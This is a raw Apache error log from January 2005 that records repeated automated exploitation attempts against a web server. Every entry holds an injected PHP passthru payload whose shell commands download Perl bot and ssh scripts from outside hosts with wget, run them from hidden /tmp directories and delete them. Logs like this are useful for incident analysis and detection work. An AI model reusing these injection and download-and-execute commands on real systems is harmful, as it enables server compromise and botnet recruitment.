[Sat Jan 1 08:54:48 2005] [error] [client 81.169.171.98] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Sat Jan 1 13:48:46 2005] [error] [client 64.240.156.248] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;mkdir .temp22;cd .temp22;wget http://www.quasi-sane.com/pics/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Sat Jan 1 14:30:00 2005] [error] [client 81.169.186.81] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Sat Jan 1 15:07:21 2005] [error] [client 193.158.85.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Sat Jan 1 20:02:02 2005] [error] [client 82.165.33.199] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Sat Jan 1 22:19:20 2005] [error] [client 217.160.207.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Sat Jan 1 22:58:30 2005] [error] [client 81.169.186.81] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Sun Jan 2 06:15:47 2005] [error] [client 217.160.109.18] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Sun Jan 2 06:26:35 2005] [error] [client 217.160.109.198] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Sun Jan 2 09:24:23 2005] [error] [client 64.240.156.248] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;mkdir .temp22;cd .temp22;wget http://www.quasi-sane.com/pics/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Sun Jan 2 09:59:22 2005] [error] [client 217.160.130.70] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Sun Jan 2 13:09:50 2005] [error] [client 64.240.156.248] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;mkdir .temp22;cd .temp22;wget http://www.quasi-sane.com/pics/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Sun Jan 2 21:09:45 2005] [error] [client 193.158.85.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 01:21:24 2005] [error] [client 217.160.130.70] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 01:48:15 2005] [error] [client 212.112.232.149] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 02:19:20 2005] [error] [client 81.169.186.81] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 04:52:20 2005] [error] [client 217.160.130.70] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 05:35:40 2005] [error] [client 217.160.130.70] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 06:44:34 2005] [error] [client 217.160.142.237] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 10:01:42 2005] [error] [client 81.169.186.81] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 14:17:41 2005] [error] [client 193.158.85.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 16:13:51 2005] [error] [client 217.160.130.70] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 16:51:03 2005] [error] [client 67.63.176.110] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 16:52:00 2005] [error] [client 193.158.85.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 18:16:04 2005] [error] [client 207.44.244.41] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 20:11:40 2005] [error] [client 62.75.160.169] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 20:30:42 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 20:46:02 2005] [error] [client 64.191.29.200] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 21:46:43 2005] [error] [client 130.230.88.16] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 22:25:43 2005] [error] [client 81.169.171.98] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 22:45:41 2005] [error] [client 65.75.177.60] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 22:48:39 2005] [error] [client 207.44.244.41] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 22:53:35 2005] [error] [client 69.61.61.146] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 23:24:56 2005] [error] [client 207.44.244.41] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 23:25:17 2005] [error] [client 81.169.171.98] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Mon Jan 3 23:46:34 2005] [error] [client 212.100.254.201] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 01:16:56 2005] [error] [client 69.61.61.146] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 02:17:05 2005] [error] [client 195.166.130.121] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 02:20:45 2005] [error] [client 66.98.214.89] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 02:25:53 2005] [error] [client 66.90.89.101] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 04:22:57 2005] [error] [client 195.137.212.38] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 04:26:02 2005] [error] [client 217.160.142.237] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 05:45:45 2005] [error] [client 64.191.29.200] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 06:28:14 2005] [error] [client 217.160.142.237] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 06:50:24 2005] [error] [client 66.90.89.101] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 07:10:44 2005] [error] [client 212.100.254.201] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 08:09:36 2005] [error] [client 217.160.130.70] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 08:20:03 2005] [error] [client 66.79.186.70] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 09:24:56 2005] [error] [client 210.245.161.135] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 10:22:41 2005] [error] [client 69.61.61.146] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 12:03:10 2005] [error] [client 210.245.161.135] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 12:07:57 2005] [error] [client 81.169.171.98] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 13:44:38 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 13:44:48 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 13:44:57 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 13:45:09 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 13:45:22 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 13:45:33 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 13:45:48 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

